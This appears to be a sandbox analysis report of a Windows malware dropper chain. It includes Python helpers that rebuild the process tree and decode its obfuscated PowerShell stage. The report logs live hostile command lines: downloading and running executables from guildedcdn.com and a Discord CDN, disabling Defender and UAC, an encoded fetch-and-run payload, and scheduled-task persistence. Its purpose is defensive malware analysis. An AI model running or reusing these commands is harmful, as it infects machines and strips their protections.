Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (identical row recorded 28 times; collapsed)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 4272 (x3) N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 220 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1532 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 3392 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2492 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4412 wrote to memory of 412 (x2) N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4272 wrote to memory of 1256 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4752 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2484 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 2680 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1356 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 3340 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1356 wrote to memory of 2216 (x3) N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 2156 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2156 wrote to memory of 2196 (x3) N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2216 wrote to memory of 5036 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 5036 wrote to memory of 3996 (x3) N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 1432 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1436 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 2448 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4472 (x3) N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 672 (x2) N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\cmd.exe
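
The rows in this table are individual write events into a freshly created child, so the same parent/child pair shows up two or three times and the chain is hard to read as printed. The Python below is an added example, not part of the sandbox report: it parses rows in exactly this table's format, collapses the repeats into one edge per parent/child pair while keeping the event count, and prints the resulting process tree. ROWS is an excerpt of the table above copied as printed; the helper names are this example's own.

```python
"""Rebuild the parent/child process tree from 'wrote to memory of' rows.
Added example, not part of the report. ROWS is an excerpt of the
WriteProcessMemory table above; the helper names are this example's own."""
import re
from collections import Counter, defaultdict

ROWS = r"""
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4412 wrote to memory of 412 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4412 wrote to memory of 412 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4472 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\cmd.exe
"""

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+)\s+(\S+)\s+(.+)$")
# Split the two image columns on the space before the next drive-letter path, so
# images whose path contains spaces (C:\Program Files\...) survive intact.
PATH_SPLIT_RE = re.compile(r"\s+(?=[A-Za-z]:\\)")


def parse_rows(text):
    """Yield (parent_pid, child_pid, parent_image, child_image) per well-formed row."""
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ppid, cpid, _indicator, rest = m.groups()
        paths = PATH_SPLIT_RE.split(rest)
        if len(paths) == 2:
            yield int(ppid), int(cpid), paths[0], paths[1]


def build_tree(text):
    """Collapse repeated rows into one edge per (parent, child), keeping the event count."""
    children, images, counts = defaultdict(list), {}, Counter()
    for ppid, cpid, pimg, cimg in parse_rows(text):
        images.setdefault(ppid, pimg)
        images.setdefault(cpid, cimg)
        if cpid not in children[ppid]:
            children[ppid].append(cpid)
        counts[(ppid, cpid)] += 1
    return children, images, counts


def roots(children):
    """Parents that never appear as anyone's child: the top of each chain."""
    spawned = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in spawned)


def ancestry(children, pid):
    """Path from the chain's root down to pid."""
    parent_of = {c: p for p, kids in children.items() for c in kids}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return chain[::-1]


def render(children, images, counts, pid, depth=0, events=None):
    """Indented tree; the (xN) suffix is how many write events backed that edge."""
    suffix = "" if events is None else f"  (x{events})"
    lines = [f"{'  ' * depth}{pid} {images[pid]}{suffix}"]
    for c in children.get(pid, []):
        lines.extend(render(children, images, counts, c, depth + 1, counts[(pid, c)]))
    return lines


if __name__ == "__main__":
    tree, names, n = build_tree(ROWS)
    for r in roots(tree):
        print("\n".join(render(tree, names, n, r)))
```

Run stand-alone it prints two chains: resources.exe (3232) down through cmd.exe, RunNihaiersion.exe, israil.exe and the 32-bit to 64-bit cmd.exe hop, and OpenWith.exe (4412) opening NOTEPAD.EXE. Feeding it the whole table instead of the excerpt gives the full tree.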

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\VisualStudio.csproj

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\6rs03E3DBT.exe

C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

C:\Users\Admin\AppData\Roaming\ChromeCrt.exe

"C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"

C:\Users\Admin\AppData\Roaming\WiDefault.exe

"C:\Users\Admin\AppData\Roaming\WiDefault.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd
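
The only stage of the chain that is not readable as logged is the powershell.exe -EncodedCommand invocation a few entries up. The Python below is an added example, not part of the sandbox report: it takes the base64 blob exactly as recorded, decodes it as UTF-16LE (what powershell.exe expects for -EncodedCommand, so a plain base64-to-UTF-8 decode produces garbage), strips the <# ... #> block comments the author wedged between tokens as junk padding, and pulls out the download URL and the drop name. ENCODED is the string copied from the command line above; helper names and regexes are this example's own.

```python
"""Decode the -EncodedCommand blob logged above and pull out its IOCs.
Added example, not part of the report. ENCODED is copied verbatim from the
powershell.exe command line above; helper names are this example's own."""
import base64
import re

ENCODED = "PAAjAGoAdQB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMAA5ADkANQAyADMANgAzADEAOQAzADEAMwAvAFcAaQBuAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACwAIAA8ACMAcgBoAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGEAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGQAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwBrAGUAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHIAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBlAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVwBpAEQAZQBmAGEAdQBsAHQALgBlAHgAZQAnACkAPAAjAGgAZgB3ACMAPgA="

BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)  # <# junk #> padding between tokens
ENC_ARG_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+\"?([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
CHILD_PATH_RE = re.compile(r"-ChildPath\s+'([^']+)'")


def decode_encoded_command(blob):
    """powershell.exe -EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def encode_command(script):
    """Inverse of the above; useful for building fixtures when writing detections."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def strip_block_comments(script):
    """Drop <# ... #> comments (pure obfuscation here) and squeeze the gaps they leave."""
    return re.sub(r"[ \t]{2,}", " ", BLOCK_COMMENT_RE.sub("", script)).strip()


def extract_iocs(script):
    """URLs fetched, file names the script drops, and whether it sleeps before acting."""
    return {
        "urls": URL_RE.findall(script),
        "dropped_names": sorted(set(CHILD_PATH_RE.findall(script))),
        "sleeps_first": script.startswith("Start-Sleep"),
    }


def analyse_command_line(cmdline):
    """Locate the encoded argument in a full command line, decode, de-obfuscate, extract."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument in command line")
    script = strip_block_comments(decode_encoded_command(m.group(1)))
    info = extract_iocs(script)
    info["script"] = script
    return info


if __name__ == "__main__":
    info = analyse_command_line(f'powershell.exe -EncodedCommand "{ENCODED}"')
    print(info["script"])
    print("downloads:", info["urls"])
    print("drops as:", info["dropped_names"], "| sleeps first:", info["sleeps_first"])
```

Decoded, the script sleeps 15 seconds, downloads https://cdn.discordapp.com/attachments/1167540816890302574/1167540995236319313/WinDefault.exe with System.Net.WebClient into $env:AppData\WiDefault.exe and starts it, which is the C:\Users\Admin\AppData\Roaming\WiDefault.exe process listed above (followed by the RegAsm.exe instance it hosts its payload in). Note that the sleep is in-process (Start-Sleep), so unlike the batch stages it leaves no timeout.exe child to spot; and the Discord CDN is a second hosting service on top of guildedcdn.com, both of which belong in the blocklist derived from this sample.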

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

